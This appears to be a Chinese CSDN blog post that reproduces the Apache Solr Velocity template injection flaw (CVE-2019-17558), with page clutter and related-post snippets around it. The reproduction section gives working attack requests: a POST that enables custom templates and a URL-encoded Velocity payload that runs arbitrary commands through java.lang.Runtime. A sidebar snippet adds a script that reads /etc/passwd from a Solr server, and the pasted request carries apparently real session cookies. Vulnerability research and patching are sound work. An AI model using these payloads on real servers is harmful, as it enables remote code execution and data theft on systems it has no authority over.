Apache Solr Velocity 注入远程命令执行漏洞 (CVE-2019-17558)

已于 2024-01-26 08:41:28 修改
阅读量720 收藏 14
点赞数 21
文章标签: solr 网络安全
于 2024-01-25 10:05:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57900228/article/details/135836294
版权
本文介绍了ApacheSolr的一个漏洞,攻击者可在5.0.0至8.3.1版本中利用输入验证错误在Solr服务器上执行任意代码。漏洞复现步骤包括启用自定义模板和使用Velocity模板执行命令,建议升级至最新版本以修复此问题。
摘要由CSDN通过智能技术生成

声明:文章仅供安全研究与学习之用,请勿用于非法用途!

一、简介

Solr 是一个开源的企业级搜索服务器,底层使用易于扩展和修改的Java 来实现。服务器通信使用标准的HTTP 和XML,所以如果使用Solr 了解Java 技术会有用却不是必须的要求。

Solr 主要特性有:强大的全文检索功能,高亮显示检索结果,动态集群,数据库接口和电子文档(Word ,PDF 等)的处理。而且Solr 具有高度的可扩展,支持分布搜索和索引的复制。

二、漏洞介绍

Apache Solr 5.0.0版本至8.3.1版本中存在输入验证错误漏洞。攻击者可借助Velocity模板利用该漏洞在系统上执行任意代码。

三、影响范围

Apache Solr 5.0.0 ~8.3.1

四、漏洞复现

1、默认情况下params.resource.loader.enabled配置未打开,无法使用自定义模板。

     可以先通过如下API获取所有的核心,

http://IP:端口/solr/admin/cores?indexInfo=false&wt=json

2、启用配置 params.resource.loader.enabled 为true,在url访问/solr/name/config,burpsuit抓包
      改成POST然后修改启动配置

      添加如下请求体,

  payload:

POST /solr/name/config HTTP/1.1
Host: IP:端口
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: rememberMe=ZrWSOx/f1eB8kMCUxBKVtpvavMAcnzYhOV12brxMjtGhkKQn5c4s7ebXkSK3L2h2xsHd1X6/dsnPxexTbyDyUu9iX9f1VZ4nzzw0JHvqBIvE++K6sQvy5zQQwTrV01QD63ixjVF6X7UnJffNxBo7PFXIPox+3el8hn5iyyrEgPKerTpiVCzZvejQYX3+Jw5mZyB37u1i7HkayHi2xKhqyAILpQIc3IC/c7ttiyRtb7vZrrxcUcxg9usK6KH4+4r79MZAbve+5WyprSv5FjmuUAISVnmYb+jFB60Lj5/DBMDhqh76I3+u2/v05xCHPY5yPR7uOyIkKJW5V4Eevn3a4oX0DIbR16m+bUhu9mimNcbGXaQMGXpEBOs6zo9RZabRhG15/Pa0ILRrlsydVkLQQ7oIRSHb6xlVvh3lcwyVnnxKeEcl8e3fv4Fi8b0Gy3ceJQVD3PM+Xt1nOsBryIj2BBxscyEk1oq7AmL/pLAmow5Jpq+WC6OzSY7kAsLkI/9k; JSESSIONID=DD1A8B91F1B2FB55E5513FD495DCF51E; PHPSESSID=vuepd29fdnl0h1sed6lrg8nea1; ADMINCONSOLESESSION=EFzGRVL02XWVtpKgizObGYq823nJwosV50EHY1W6OGTj5BKqBElL!-1101485479; -http-session-=4::http.session::f35ab9c4d2b3ff41989f7c9b68125358; Hm_lvt_deaeca6802357287fb453f342ce28dda=1635738037; Hm_lpvt_deaeca6802357287fb453f342ce28dda=1635738037
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 259

{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}

3、通过Velocity模板执行命令,如whoami。修改exec(%27whoami%27)中的代码即可更改命令。

      注意:此时burpsuit里面请求方法由POST改为GET

payload:

/solr/name/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27whoami%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

4、使用python脚本进行漏洞利用,使用python3运行;

     注:此类利用脚本GitHub上很多可自行搜索

五、修复建议

建议升级Apache Solr到最新版。

茉香奶绿正常冰
关注
  • 21
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Java安全之Velocity模版注入
Huangjiazhen711的博客
09-22 1720
我们提供了五条基本的模板脚本语句,基本上就能满足所有应用模板的要求。Apache Velocity是一个基于Java的模板引擎,它提供了一个模板语言去引用由Java代码定义的对象。这是我们不希望的,为了把不存在的变量或变量值为null的对象显示为空白,则只需要在变量名前加一个“!如:在EasyJWeb各种开源应用中,我们经常看到的用于弹出提示信息msg的例子。在html标签中显示经过HtmlUtil对象处理过后的msg对象的值。,其中涉及到了ast的处理,感兴趣的师傅可以自己跟下看看。
apache solr velocity 注入远程命令执行漏洞 (cve-2019-17558)
whatday的专栏
06-26 1288
Apache Solr 是一个开源的搜索服务器。 在其 5.0.0 到 8.3.1版本中,用户可以注入自定义模板,通过Velocity模板语言执行任意命令。 具体漏洞原理和POC可以参考: https://nvd.nist.gov/vuln/detail/CVE-2019-17558 https://issues.apache.org/jira/browse/SOLR-13971 https://gist.github.com/s00py/a1ba36a3689fa13759ff910e179fc
Apache Solr Velocity模板注入RCE
自强不息
05-02 1251
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
java 模板引擎_Apache Solr Velocity模板注入漏洞深度分析
weixin_39753747的博客
12-01 575
1. 漏洞分析环境搭建需要工具IDEAApache AntApache Solr8.2.0源码Apache Solr8.2.0服务端ChromeBurp2. Apache solr 简介和漏洞复现首先先简单介绍一下Apache SolrApache Solr是一个强大的搜索服务器,它支持像API一样的REST。Solr由Lucene提供支持,可以实现强大的匹配功能,例如短语,通配符,连接...
Apache Solr Velocity模板注入远程命令执行漏洞
蚁景网安学院
11-01 488
0x00 前言今天在群里看到有人说GitHub上公布了一个关于solr的RCE漏洞,于是立马复现了一波!确定该poc是真实有效的。Solr是一个独立的企业级搜索应用服务器,它对外提供类似...
solr_exploit:Apache Solr远程代码执行突破(CVE-2019-0193)漏洞利用
03-10
声明 此处提供的漏洞检测方法,文件等内容,均仅限于安全从业者在获得法律授权的情况下使用,目的是检测已授权的服务器的安全性。...文档中只有一个item元素骑士实现只执行1次命令 也可以自己启动网络服务器托
CVE-2019-0193 Apache-Solr via Velocity template RCE.MD
04-12
CVE-2019-0193 Apache-Solr via Velocity template RCE
Apache Tomcat CVE-2019-0232 远程代码执行漏洞 - tdcoming'blog QQ group 90
08-04
背景:近日,ApacheSolr官方团队在最新的安全更新中披露了一则ApacheSolrDeserialization远程代…阅读数 1386557篇文章排名:
CVE-2020-13957 Apache Solr 未授权上传.md
04-13
CVE-2020-13957 Apache Solr 未授权上传
Velocity自定义标签无法注入spring的Service解决办法
02-12
用springMVC+velocity时,当使用自定义标签,发现自定义标签无法注入spring的其它服务类,归根源码发现,velocity的源码中有一段,有一段代码永远获取的是新实例。所以,把这个地方的源码改了,所以使用这个的时候,已经不是原版的velocity,这个问题很久以前就解决了,最近看velocity又开始重新维护,版本为2.0,以为会解决这个问题,一看,还是没有,所以我还是发布出来吧该版本在1.7版本上做的,如果使用2.0版本的功能,这个是不满足的。这个过程我有两个地方改动。请参照jar包里的说明。
Apache Solr Velocity注入远程命令执行(CVE-2019-17558)
m0_65150886的博客
02-27 452
2019年10月30日,国外安全研究人员放出了一个关于solr模板注入的exp,攻击者通过未授权访问solr服务器,发送特定的数据包开启params.resource.loader.enabled,然后通过get请求访问接口导致服务器命令执行。2.默认情况下params.resource.loader.enabled配置未打开,无法使用自定义模板。我们先通过如下API获取所有的核心。3.通过如下请求开启params.resource.loader.enabled,其中API路径包含刚才获取的core名称。
JAVA框架漏洞
weixin_68408599的博客
06-14 1214
此次漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。漏洞原因:我们请求的URL在整个项目的传入传递过程。Apache Shiro框架提供了Remember Me功能,用户登录成功后会生成经过加密并编码的Cookie,即使关闭了浏览器,再次访问时无需进行登录操作即可以之前的身份访问网站。漏洞的出现就在URL1,URL2和URL3 有可能不是同一个URL,这就导致我们能绕过shiro的校验,直接访问后端需要首选的URL。
vulhub中Apache Solr Velocity 注入远程命令执行漏洞复现 (CVE-2019-17558)
最新发布
yougexiaojiuguan的博客
04-04 487
漏洞复现过程的记录
服务器端模板注入(SSTI)详解
键盘的起始页
01-11 1605
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。 模板引擎也会提供沙箱机制来进行漏洞防范,但是可以用沙箱逃逸技术来进行绕过。
CVE-2019-0193(Apache Solr Velocity模板注入RCE)漏洞复现
战神/calmness的博客
11-22 961
Apache Solr Velocity模板注入RCE漏洞复现 你剥开一个很酸的橙子而感到后悔了,可对于橙子来说,那是它的一切. 目录 - 简介 - 漏洞概述 - 漏洞版本 - 漏洞复现 - 漏洞修复 简介 Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以...
Apache Solr Velocity模板注入RCE漏洞复现
Ping_Pig的博客
10-31 1442
Solr简介: Solr是一个独立的企业级搜索应用服务器,它对外提供类似于web-service的API接口,用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引,也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。 漏洞概述 近日,国外安全研究员s00py公开了一个Apache SolrVelocity模板注入漏洞.该漏洞可以攻击最新版本的S...
solr 配置多个entity_详细分析SolrCVE20190193以及velocity模板注入新洞
weixin_39804523的博客
12-18 171
环境搭建java "-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=9000" -Dsolr.solr.home="../example/example-DIH/solr/" -jar start.jar --module=http然后idea加远程调试9000端口,dist、server/lib文件夹加到lib...
详解模板注入漏洞(下)
程序猿DD
01-07 770
作者 |原作者gosecure,翻译整理shan66来源 |http://gosecure.github.io/在上一篇文章中,我们为读者详细介绍了模版注入漏洞的概念,模版引擎的识别...
cve-2019-6520编写poc
05-25
CVE-2019-6520是一个Apache Solr中的任意文件读取漏洞。攻击者可以利用该漏洞读取服务器上的任意文件。 下面是一个简单的Python脚本,可以利用该漏洞读取指定文件: ```python import requests url = "http://<target>/solr/+/get" params = { "getParams": { "content": "file:/<path to file>" } } response = requests.get(url, params=params) print(response.text) ``` 将`<target>`替换为目标服务器的IP地址或域名,将`<path to file>`替换为要读取的文件的路径。 例如,要读取`/etc/passwd`文件,可以使用以下命令: ```python import requests url = "http://example.com/solr/+/get" params = { "getParams": { "content": "file:/etc/passwd" } } response = requests.get(url, params=params) print(response.text) ``` 请注意,此脚本仅用于学习和研究目的,不应用于未经授权的攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值